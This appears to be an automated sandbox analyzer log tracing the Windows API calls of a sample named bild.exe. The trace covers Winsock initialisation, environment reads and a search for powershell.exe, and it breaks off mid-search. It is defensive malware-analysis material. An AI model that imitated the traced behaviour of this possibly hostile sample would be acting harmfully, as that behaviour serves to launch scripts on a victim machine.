# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: May 6 2020 08:26:37 # Log Creation Date: 08.05.2020 10:35:55.146 Process: id = "1" image_name = "bild.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bild.exe" page_root = "0x37983000" os_pid = "0xad8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bild.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xadc [0043.806] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77940000 [0043.810] GetProcAddress (hModule=0x77940000, lpProcName="AddDllDirectory") returned 0x0 [0043.811] GetProcAddress (hModule=0x77940000, lpProcName="AddVectoredContinueHandler") returned 0x77b43ae0 [0043.811] GetProcAddress (hModule=0x77940000, lpProcName="GetQueuedCompletionStatusEx") returned 0x7798c050 [0043.811] GetProcAddress (hModule=0x77940000, lpProcName="LoadLibraryExA") returned 0x7794e3b0 [0043.811] GetProcAddress (hModule=0x77940000, lpProcName="LoadLibraryExW") returned 0x77956640 [0043.811] GetSystemDirectoryA (in: lpBuffer=0x6f7160, uSize=0x208 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0043.812] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7feff550000 [0046.640] GetProcAddress (hModule=0x7feff550000, lpProcName="SystemFunction036") returned 0x7feff551044 [0046.640] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\ntdll.dll") returned 0x77a60000 [0046.641] GetProcAddress (hModule=0x77a60000, lpProcName="NtWaitForSingleObject") returned 0x77ab1350 [0046.641] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\winmm.dll") returned 0x7fef8470000 [0049.435] GetProcAddress (hModule=0x7fef8470000, lpProcName="timeBeginPeriod") returned 0x7fef847a648 [0049.435] GetProcAddress (hModule=0x7fef8470000, lpProcName="timeEndPeriod") returned 0x7fef847a768 [0049.435] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\ws2_32.dll") returned 0x7fefdd80000 [0049.897] GetProcAddress (hModule=0x7fefdd80000, lpProcName="WSAGetOverlappedResult") returned 0x7fefdda7a50 [0049.897] GetProcAddress (hModule=0x77a60000, lpProcName="wine_get_version") returned 0x0 [0049.897] SetErrorMode (uMode=0x2) returned 0x0 [0049.897] SetErrorMode (uMode=0x8003) returned 0x2 [0049.898] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4623a0) returned 0x7f8110 [0049.898] RtlAddVectoredContinueHandler (First=0x1, Handler=0x4623b0) returned 0x7f8140 [0049.898] RtlAddVectoredContinueHandler (First=0x0, Handler=0x4623c0) returned 0x7f8170 [0049.898] SetConsoleCtrlHandler (HandlerRoutine=0x4623d0, Add=1) returned 1 [0049.898] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0049.901] GetProcessAffinityMask (in: hProcess=0xffffffffffffffff, lpProcessAffinityMask=0x22fe88, lpSystemAffinityMask=0x22fe80 | out: lpProcessAffinityMask=0x22fe88, lpSystemAffinityMask=0x22fe80) returned 1 [0049.901] GetSystemInfo (in: lpSystemInfo=0x22fef0 | out: lpSystemInfo=0x22fef0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0049.901] SetProcessPriorityBoost (hProcess=0xffffffffffffffff, bDisablePriorityBoost=1) returned 1 [0049.902] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x3c0000 [0049.903] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x700000 [0049.903] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x4) returned 0x8e0000 [0049.903] VirtualAlloc (lpAddress=0x0, dwSize=0x800000, flAllocationType=0x2000, flProtect=0x4) returned 0x23d0000 [0049.904] VirtualAlloc (lpAddress=0x0, dwSize=0x4000000, flAllocationType=0x2000, flProtect=0x4) returned 0x2bd0000 [0049.907] VirtualAlloc (lpAddress=0x0, dwSize=0x20000000, flAllocationType=0x2000, flProtect=0x4) returned 0x6bd0000 [0049.930] SystemFunction036 (in: RandomBuffer=0x6f6890, RandomBufferLength=0x8 | out: RandomBuffer=0x6f6890) returned 1 [0050.037] VirtualAlloc (lpAddress=0xc000000000, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0xc000000000 [0050.038] VirtualAlloc (lpAddress=0x0, dwSize=0x800000, flAllocationType=0x3000, flProtect=0x4) returned 0x26bd0000 [0050.038] VirtualAlloc (lpAddress=0x0, dwSize=0x21088, flAllocationType=0x3000, flProtect=0x4) returned 0x720000 [0050.039] VirtualAlloc (lpAddress=0x700000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x700000 [0050.039] VirtualAlloc (lpAddress=0x960000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x960000 [0050.039] VirtualAlloc (lpAddress=0x27d6000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x27d6000 [0050.040] VirtualAlloc (lpAddress=0x4c00000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x4c00000 [0050.040] VirtualAlloc (lpAddress=0x16d50000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x16d50000 [0050.040] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000 [0050.041] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0050.042] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x760000 [0050.042] VirtualAlloc (lpAddress=0xc000000000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000000000 [0050.042] VirtualAlloc (lpAddress=0xc000002000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000002000 [0050.043] SystemFunction036 (in: RandomBuffer=0x6f6c60, RandomBufferLength=0x80 | out: RandomBuffer=0x6f6c60) returned 1 [0050.043] VirtualAlloc (lpAddress=0xc000004000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000004000 [0050.043] VirtualAlloc (lpAddress=0xc000006000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000006000 [0050.044] GetEnvironmentStringsW () returned 0x7fe040* [0050.044] VirtualAlloc (lpAddress=0xc000008000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000008000 [0050.044] VirtualAlloc (lpAddress=0xc00000a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00000a000 [0050.044] VirtualAlloc (lpAddress=0xc00000c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00000c000 [0050.044] VirtualAlloc (lpAddress=0xc00000e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00000e000 [0050.045] VirtualAlloc (lpAddress=0xc000010000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000010000 [0050.045] VirtualAlloc (lpAddress=0xc000012000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000012000 [0050.045] VirtualAlloc (lpAddress=0xc000014000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000014000 [0050.045] FreeEnvironmentStringsW (penv=0x7fe040) returned 1 [0050.045] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\powrprof.dll") returned 0x7fefb830000 [0053.669] GetProcAddress (hModule=0x7fefb830000, lpProcName="PowerRegisterSuspendResumeNotification") returned 0x0 [0053.669] VirtualAlloc (lpAddress=0xc000016000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000016000 [0053.670] VirtualAlloc (lpAddress=0xc000020000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000020000 [0053.671] VirtualAlloc (lpAddress=0xc000022000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000022000 [0053.671] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x22fe78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x22fe78*=0x80) returned 1 [0053.671] VirtualQuery (in: lpAddress=0x22fe98, lpBuffer=0x22fe98, dwLength=0x30 | out: lpBuffer=0x22fe98*(BaseAddress=0x22f000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0053.671] VirtualAlloc (lpAddress=0xc00002a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00002a000 [0053.672] VirtualAlloc (lpAddress=0xc00002c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00002c000 [0053.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc00002a380, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x84 [0053.673] CloseHandle (hObject=0x84) returned 1 [0053.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc00002a700, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x84 [0053.676] CloseHandle (hObject=0x84) returned 1 [0053.676] VirtualAlloc (lpAddress=0xc00002e000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00002e000 [0053.677] VirtualAlloc (lpAddress=0xc000036000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000036000 [0053.677] VirtualAlloc (lpAddress=0xc000038000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000038000 [0053.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc00002aa80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x84 [0053.680] CloseHandle (hObject=0x84) returned 1 [0053.680] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x84 [0053.680] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x94 [0053.680] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0053.682] VirtualAlloc (lpAddress=0xc000086000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000086000 [0053.682] VirtualAlloc (lpAddress=0xc000088000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000088000 [0053.683] VirtualAlloc (lpAddress=0xc00008a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00008a000 [0053.683] VirtualAlloc (lpAddress=0xc00008c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00008c000 [0053.683] VirtualAlloc (lpAddress=0xc00008e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00008e000 [0053.683] VirtualAlloc (lpAddress=0xc000090000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000090000 [0053.684] VirtualAlloc (lpAddress=0xc000094000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000094000 [0053.684] VirtualAlloc (lpAddress=0xc000096000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000096000 [0053.684] VirtualAlloc (lpAddress=0xc000098000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000098000 [0053.685] VirtualAlloc (lpAddress=0xc00009a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00009a000 [0053.685] VirtualAlloc (lpAddress=0xc00009c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00009c000 [0053.685] VirtualAlloc (lpAddress=0xc00009e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00009e000 [0053.685] VirtualAlloc (lpAddress=0xc0000a0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a0000 [0053.686] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77940000 [0053.686] VirtualAlloc (lpAddress=0xc0000a2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a2000 [0053.686] GetProcAddress (hModule=0x77940000, lpProcName="GetStdHandle") returned 0x7795d750 [0053.687] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0053.687] GetProcAddress (hModule=0x77940000, lpProcName="SetHandleInformation") returned 0x77945bb0 [0053.687] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0053.687] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0053.687] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0053.687] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0053.687] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0053.687] VirtualAlloc (lpAddress=0xc0000a4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a4000 [0053.688] GetProcAddress (hModule=0x77940000, lpProcName="GetSystemDirectoryW") returned 0x77957120 [0053.688] GetSystemDirectoryW (in: lpBuffer=0xc0000a4000, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.688] VirtualAlloc (lpAddress=0xc0000a6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a6000 [0053.688] VirtualAlloc (lpAddress=0xc0000a8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a8000 [0053.688] VirtualAlloc (lpAddress=0xc0000aa000, dwSize=0xe000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000aa000 [0053.689] VirtualAlloc (lpAddress=0xc0000b8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000b8000 [0053.690] VirtualAlloc (lpAddress=0xc0000ba000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ba000 [0053.690] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\ws2_32.dll") returned 0x7fefdd80000 [0053.690] GetProcAddress (hModule=0x7fefdd80000, lpProcName="WSAStartup") returned 0x7fefdd84980 [0053.690] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xc000027d20 | out: lpWSAData=0xc000027d20) returned 0 [0053.700] GetProcAddress (hModule=0x77940000, lpProcName="CancelIoEx") returned 0x7798c5c0 [0053.700] VirtualAlloc (lpAddress=0xc0000bc000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000bc000 [0053.701] VirtualAlloc (lpAddress=0xc0000c4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000c4000 [0053.701] GetProcAddress (hModule=0x77940000, lpProcName="SetFileCompletionNotificationModes") returned 0x77990550 [0053.701] GetProcAddress (hModule=0x7fefdd80000, lpProcName="WSAEnumProtocolsW") returned 0x7fefdda8af0 [0053.701] WSAEnumProtocolsW (in: lpiProtocols=0xc0000c6e68, lpProtocolBuffer=0xc0000c6e70, lpdwBufferLength=0xc0000c6e64 | out: lpProtocolBuffer=0xc0000c6e70, lpdwBufferLength=0xc0000c6e64) returned 4 [0053.753] VirtualAlloc (lpAddress=0xc000100000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000100000 [0053.753] GetProcAddress (hModule=0x77940000, lpProcName="GetConsoleMode") returned 0x77962e60 [0053.753] VirtualAlloc (lpAddress=0xc000102000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000102000 [0053.754] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0xc0000cbe6c | out: lpMode=0xc0000cbe6c) returned 0 [0053.754] GetProcAddress (hModule=0x77940000, lpProcName="GetFileType") returned 0x77962e00 [0053.754] GetFileType (hFile=0x0) returned 0x0 [0053.754] VirtualAlloc (lpAddress=0xc000104000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000104000 [0053.754] VirtualAlloc (lpAddress=0xc000106000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000106000 [0053.754] VirtualAlloc (lpAddress=0xc000108000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000108000 [0053.755] SetEvent (hEvent=0xa0) returned 1 [0053.755] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x9e0000 [0053.755] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0xc0000cbe6c | out: lpMode=0xc0000cbe6c) returned 0 [0053.755] GetFileType (hFile=0x0) returned 0x0 [0053.755] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0xc0000cbe6c | out: lpMode=0xc0000cbe6c) returned 0 [0053.755] GetFileType (hFile=0x0) returned 0x0 [0053.755] VirtualAlloc (lpAddress=0xc00010a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00010a000 [0053.755] GetProcAddress (hModule=0x77940000, lpProcName="GetCommandLineW") returned 0x7795c480 [0053.755] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bild.exe\" " [0053.756] VirtualAlloc (lpAddress=0xc00010c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00010c000 [0053.756] VirtualAlloc (lpAddress=0xc00010e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00010e000 [0053.756] VirtualAlloc (lpAddress=0xc000110000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000110000 [0053.756] VirtualAlloc (lpAddress=0xc000112000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000112000 [0053.757] VirtualAlloc (lpAddress=0xc000114000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000114000 [0053.757] VirtualAlloc (lpAddress=0xc000118000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000118000 [0053.757] VirtualAlloc (lpAddress=0xc00011a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00011a000 [0053.757] VirtualAlloc (lpAddress=0xc00011c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00011c000 [0053.758] VirtualAlloc (lpAddress=0xc00011e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00011e000 [0053.758] VirtualAlloc (lpAddress=0xc000120000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000120000 [0053.759] VirtualAlloc (lpAddress=0xc000122000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000122000 [0053.759] VirtualAlloc (lpAddress=0xc000124000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000124000 [0053.759] VirtualAlloc (lpAddress=0xc000126000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000126000 [0053.759] GetProcAddress (hModule=0x77940000, lpProcName="GetEnvironmentVariableW") returned 0x779590a0 [0053.759] GetEnvironmentVariableW (in: lpName="GODEBUG", lpBuffer=0xc00010c0d0, nSize=0x64 | out: lpBuffer="") returned 0x0 [0053.759] VirtualAlloc (lpAddress=0xc000128000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000128000 [0053.760] VirtualAlloc (lpAddress=0xc00012a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00012a000 [0053.760] VirtualAlloc (lpAddress=0xc00012c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00012c000 [0053.761] VirtualAlloc (lpAddress=0xc000130000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000130000 [0053.761] VirtualAlloc (lpAddress=0xc000134000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000134000 [0053.761] VirtualAlloc (lpAddress=0xc000136000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000136000 [0053.762] VirtualAlloc (lpAddress=0xc000138000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000138000 [0053.762] VirtualAlloc (lpAddress=0xc00013a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00013a000 [0053.762] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xc00010c1a0, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0053.762] VirtualAlloc (lpAddress=0xc00013c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00013c000 [0053.762] VirtualAlloc (lpAddress=0xc00013e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00013e000 [0053.762] VirtualAlloc (lpAddress=0xc000140000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000140000 [0053.763] VirtualAlloc (lpAddress=0xc000142000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000142000 [0053.763] GetProcAddress (hModule=0x77940000, lpProcName="GetFileAttributesExW") returned 0x7794b7a0 [0053.763] GetFileAttributesExW (in: lpFileName="powershell.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.763] GetProcAddress (hModule=0x77940000, lpProcName="CreateFileW") returned 0x77951870 [0053.764] CreateFileW (lpFileName="powershell.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.764] GetFileAttributesExW (in: lpFileName="powershell.exe.com" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.764] CreateFileW (lpFileName="powershell.exe.com" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.764] GetFileAttributesExW (in: lpFileName="powershell.exe.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.764] CreateFileW (lpFileName="powershell.exe.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.764] GetFileAttributesExW (in: lpFileName="powershell.exe.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.764] CreateFileW (lpFileName="powershell.exe.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.764] GetFileAttributesExW (in: lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.764] CreateFileW (lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.764] GetFileAttributesExW (in: lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.764] CreateFileW (lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.765] GetFileAttributesExW (in: lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.765] CreateFileW (lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0053.765] 